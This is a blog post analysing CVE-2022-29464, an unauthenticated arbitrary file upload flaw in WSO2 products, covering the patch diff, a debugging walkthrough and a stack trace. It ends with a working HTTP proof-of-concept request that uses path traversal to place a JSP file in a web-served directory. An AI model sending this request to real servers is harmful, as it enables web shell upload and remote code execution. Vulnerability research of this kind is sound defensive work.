Posted Updated Security4 minutes read (About 611 words)

Wso2_Vul_Analysis_cve_2022_29464

0x00 Official information

On Apr 20,I found that someone posted a meesage on twitter.It was a message about cve-2022-29464.
Actually, we can get a lot of information of this vuln from wso2 official website and cve website.

1
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738

Obviously,it is an unrestricted arbitrary file upload vulnerability.I installed a test enviroment and analyse the patch,so that I got the real poc by using reverse engineering.

1
https://github.com/wso2/product-apim/releases

0x01 Patch

1
https://github.com/wso2/carbon-kernel/pull/3152/files/13795df0a5b6a2206fd0338abfff057a7b99e1bb

There are two package files that have been modified.

  1. Using method verifyCanonicalDestination to verify allowed file extension on FileUploadService.java
  2. In package org.wso2.carbon.ui, these files have been deteled.And the class AnyFileUploadExecHandler have been removed from AnyFileUploadExecHandler.
  • deleted
    1
    2
    3
    4
    JarZipUploadExecutor.java
    KeyStoreFileUploadExecutor.java
    ToolsAnyFileUploadExecutor.java
    ToolsFileUploadExecutor.java
  • modified
    1
    AnyFileUploadExecHandler
    These were key information for me at that time.

0x02 Wrong Direction

At first,I thoght that FileUploadService.java would be the trigger point for this vulnerability.I spent lots of time to build my POC by using this way.Because FileUploadService.java could be called by FileUploadService.wsdl.


As you can see,it didn’t work.It needed authorization to access to the server.

0x03 Right Direction

When I went back to see the details of this vulnerability on official website,I found that we were asked to add some rules fix the bug.

That may be the key point to this vulnerability.I found that the web path “/fileupload” on FileUploadExecutorManager.class

I changed wso2 server to debug mode with –debug.And I had to seek the real api path to upload file.

When i used path “/fileupload/“ + random path, such as /fileupload/testtest,no file was being created.When I use “/fileupload/“ + “resource”,the server returned a exception string to me.

When I was trying to debug and finding what happened inside,I found that iterator would return strings list

1
key,resource,anyFiles,...


The corresponding code would be called by key variable.It means that if we change path to “/fileupload/toolsAny”,ToolsAnyFileUploadExecutor.java will be called.

Directory will be set as “../extra/..”. We can control the filename so that “../“ will be used to upload arbitrary file.

stacks

1
2
3
4
5
6
7
8
parseRequest:347, FileUploadBase (org.apache.commons.fileupload)
parseRequest:220, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)
parseRequest:152, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)
executeGeneric:103, AbstractFileUploadExecutor (org.wso2.carbon.ui.transports.fileupload)
execute:436, FileUploadExecutorManager$CarbonXmlFileUploadExecHandler (org.wso2.carbon.ui.transports.fileupload)
startExec:320, FileUploadExecutorManager$FileUploadExecutionHandlerManager (org.wso2.carbon.ui.transports.fileupload)
execute:127, FileUploadExecutorManager (org.wso2.carbon.ui.transports.fileupload)
doPost:57, FileUploadServlet (org.wso2.carbon.ui.transports)

0x04 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /fileupload/toolsAny HTTP/1.1
Host: 127.0.0.1:9443
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
Content-Length: 319
Connection: close
urn:uploadFiles
Upgrade-Insecure-Requests: 1

-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="../../../../repository/deployment/server/jaggeryapps/publisher/cmd.jsp";filename="cmd.jsp"
Content-Type: application/octet-stream

<% out.print("123"); %>
-----------------------------250033711231076532771336998311--


0x05 Reference

https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
https://github.com/wso2/carbon-kernel/pull/3152/files/13795df0a5b6a2206fd0338abfff057a7b99e1bb
https://twitter.com/vcslab/status/1516369262469738496

Wso2_Vul_Analysis_cve_2022_29464

https://julianwu.org/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/

Author

JulianWu

Posted on

2022-04-21

Updated on

2023-01-12

Licensed under

#

Comments

Follow

Categories

Catalogue

Recents

Archives

Tags

Devlopment1
Vulnerability Analysis1
daily_life1
×